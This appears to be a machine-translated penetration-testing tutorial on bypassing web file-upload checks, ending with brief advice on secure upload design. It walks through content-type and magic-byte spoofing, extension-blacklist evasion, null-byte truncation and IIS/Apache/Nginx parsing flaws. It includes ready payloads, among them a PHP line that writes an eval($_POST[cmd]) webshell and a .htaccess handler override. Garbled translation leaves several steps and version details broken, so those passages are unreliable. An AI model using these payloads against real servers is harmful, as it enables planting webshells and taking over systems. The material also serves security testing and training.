There are various verification methods when uploading files, which are generally divided into client-side and server-side verification, which are also refined into many verification methods, which verify the file suffix, size, etc.
Client-side validation: As the name suggests, it is validated on the user's browser with a piece of javascript code
Judgment method: For the image to be uploaded, if you haven't clicked confirm after loading, it will prompt a file error and no data packet will be sent at this time.
Breakthrough method:
1. Disable the javascript code directly on the browser, cancel the verification.
2. Burp truncates and changes the package
First, change the uploaded Trojan suffix to jpg, grab the uploaded package through burpsuit, and then change the jpg in the grabbed package to PHP
Server-side verification
1. content-type field verification, filetype verification
content-type reads the suffix of the uploaded file, and captures the package to modify
Change the content-type field to image/gif to bypass
2. File header verification
can be done by writing regular matches to determine whether the file header content meets the requirements. Here are a few common file header correspondences:
(1) .JPEG ;.JPE;.JPG, ”JPGGraphic File”
(2) .gif, ”GIF 89A”
(3) .zip, ”Zip Compressed”
(4) .doc;.xls;.xlt;.ppt;.apr,” MS Compound Document v1 or Lotus Approach APRfile”
The file header bypass
adds some file information on the basis of the Trojan horse content, which is a bit like the following structure
GIF89a<?php phpinfo(); ?>
3. Extension verification
MIME verification
MIME (Multipurpose Internet Mail Extensions) Multipurpose Internet Mail Extensions Types of. It is a way of setting a file with a certain extension to be opened with an application. When the extension file is accessed, the browser will automatically use the specified application to open. It is mostly used to specify some client-defined file names, as well as some media file opening methods.
It is an Internet standard that extends the e-mail standard to support:
text in non-ASCII characters; attachments in non-text formats (binary, sound, image, etc.); message bodies consisting of multiple parts; containing non-ASCII characters Character header information (Header information).
This standard is defined in RFCs such as RFC 2045, RFC 2046, RFC 2047, RFC 2048, RFC 2049, etc. MIME improves upon RFC 2822, which was transformed from RFC 822, which stated that the e-mail standard did not allow the use of characters other than the 7-bit ASCII character set in mail messages. Because of this, some non-English character messages and non-text messages such as binary files, images, sounds, etc. cannot originally be transmitted in email (MIME can). MIME specifies a symbolic method for representing various data types. In addition, the MIME framework is also used in the HTTP protocol used in the World Wide Web, and the standard is extended to Internet media types.
The role of MIME
enables client software to distinguish different kinds of data. For example, web browsers use MIME types to determine whether a file is a GIF image or a printable PostScript file. Web servers use MIME to specify the type of data to send, and web clients use MIME to specify the type of data they expect to receive.
A normal text mail message consists of a header part (To: From: Subject: etc.) and a body part (Hello Mr., etc.). In a MIME-compliant message, it is not surprising that a header is also included. The various parts of the message are called MIME segments, and each segment is also prefixed with a special header. MIME mail is just an extension based on RFC 822 mail, however it has its own set of RFC specifications.
Header field: MIME header is roughly divided into MIME information header and MIME segment header according to the position in the mail packet. (The MIME header refers to the header of the entire message, while the MIME segment header is only the header of each MIME segment.)
Common MIME types
The mimntype judgment
generally judges the first ten bytes of the content to judge the file type, and then judges the suffix name.
File extension bypassing
premise: Blacklist verification
Blacklist detection: Generally, there is a special blacklist file, which will contain common dangerous script files.
Bypass method:
(1) Look for the blacklisted extensions - such as asa and cer.
(2) There may be case bypass vulnerabilities - such as aSp and pHp. The
list of file extensions that can be parsed:
jsp jspx jspf
asp asa cer aspx
4. Compatible with the premise of file inclusion vulnerabilities
: The verification rule only checks whether the content of the file with the suffix asp/php/jsp is a Trojan horse.
Bypass method: (Take php as an example here, this vulnerability mainly exists in PHP)
(1) First upload a txt suffix file whose content is a Trojan horse, because the relationship between the suffix names does not check the content;
(2) Then upload a . php file, the content is "uploaded txt file path");?>
At this time, the php file will refer to the content of the txt file, thereby bypassing the verification, the following lists the included syntax:
(2) suffix under linux The upper and lower case of the name
is under linux. If the uploaded php is not parsed, you can try to upload the file name with the suffix of pHp.
5. Editor Vulnerabilities
(1) CMS Vulnerabilities: For example, vulnerabilities such as JCMS can be bypassed for uploading vulnerabilities existing in different CMSs.
(2) Editor vulnerabilities: For example, FCK, ewebeditor, etc., can be bypassed for editor vulnerabilities.
The loopholes in these two aspects will be summarized separately in the future, and here is the end.
Cooperate with other rules
(1) 0x00 truncation: caused by a combinational logic loophole, usually exists when constructing the upload file path
test.php(0x00).jpg
test.php%00.jpg
path/upload/1.php (0x00 ), the file name is 1.jpg, combined with /upload/1.php(0x00)/1.jpg
6. Detecting the bypass of the blacklist type (server)
Write the dangerous suffix name into a file, prohibit pointing to the suffix File
name bypass:
case combination bypass pHp, PhP, mashup bypass php1, php2, php3, php4, php5
List name bypass:
cer, ashx, asa, cer, cdx, htr, bypass (
Special characters that may be missed by the blacklist) bypass:
change a.asp to a.asp_
0x00 truncate bypass:
upload 1.php.jpg burp capture and change it to 1.php%00.jpg, or hex–>20 Change it to 00 when parsing, if you see a space, the following paragraph will not be parsed
or upload/1.asp(space)/upload, hex modify 20–>00 to bypass upload
apache parsing bypass:
help.asp. 134.×2, try to parse from front to back until you encounter an extension you know.
Double extension parsing bypass:
apache's conf configuration has AddHandler php5-script.php is not commented out,
then the file name 1.php.jpg can be executed as php
.htaccess file attack:
Custom .htaccess upload, the following is the content
<FileMatch “aaa”>
SetHandler application/x-httpd-php
</FileMatch>
In the same directory, upload an aaa file, no extension, the content is a sentence, At this time, it was successfully bypassed.
7. Detect bypass of whitelist type (server side)
Parsing vulnerability bypass
iis6.0 parsing bypass:
Directory bypass:
IIS6.0 directory path detection and parsing, the file name is "*.asp/xxx.jpg" is also parsed into asp
burp for packet capture, where Content-Disposition :form-data;name=”path” We change the original upload/ to uploading/1.asp/, and filename=”yijuhua.asp” to filename=”yijuhua.asp/1.jpg”.
Or create a folder a.php and put a sentence picture 1.jpg a.php/1.jpg—>php executes the
file bypass:
first we request /aaa.php;xxx.jpg, look for "." from the head number, get .php;xxx.jpg
look for ";", if there is, the content will be truncated, so /aaa.php;xxx.jpg will be parsed as /aaa.php, in addition, we have the following construction methods to circumvent Pass: a.php;.jpg, a.php;jpg–>php execute
iis7.0/7.5 parsing bypass:
upload a file 1.jpg
content: <?php fputs(fopen ('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
Then visit 1.jpg/.php This will generate a Trojan shell in the same directory .php
Nginx<8.0.3 parsing bypass:
upload 1.jpg—burp modification –> 1.jpg%00.php null byte bypass uploading
apache parsing bypass:
a.php.x1.x2 apache tries to parse from front to back until it encounters an extension it recognizes.
.htaccess file attack: custom .htaccess bypass
<FileMatch "aaa">
SetHandler application/x-httpd-php
</FileMatch>
In the same directory, upload an aaa file without an extension, and then the content is "aaa" + sentence If so, successfully bypassed.
8. Bypassing the automatic modification of the suffix:
–
uploading php, the server will automatically modify it to gif
burp capture package, 1.php –> modify it to 1.pphphp successfully bypass
8. Double file upload breakthrough
added by yourself, this method I saw it in an article of a big cow. I don’t know what the principle is, but I often use it.
Personal understanding is that two upload ports upload files separately, and the server only filters one.
I prefer to copy the uploaded module by changing html. copy, so there will be two upload points~
Design a secure file upload function
1. The file upload directory is set to be non-executable
2. Determine the file type: the whitelist method is strongly recommended. In addition, for image processing, a compression function or a resize function can be used to destroy the HTML code that may be contained in the image while processing the image.
3. Use random numbers to rewrite the file name and file path: one is that it cannot be accessed after uploading; the other is that files such as shell.php.rar.rar and crossdomain.xml will not be attacked due to renaming.
4. Set the domain name of the file server separately: Due to the browser same-origin policy, a series of client-side attacks will fail, such as uploading crossdomain.xml, uploading XSS exploits containing Javascript, etc. will be resolved.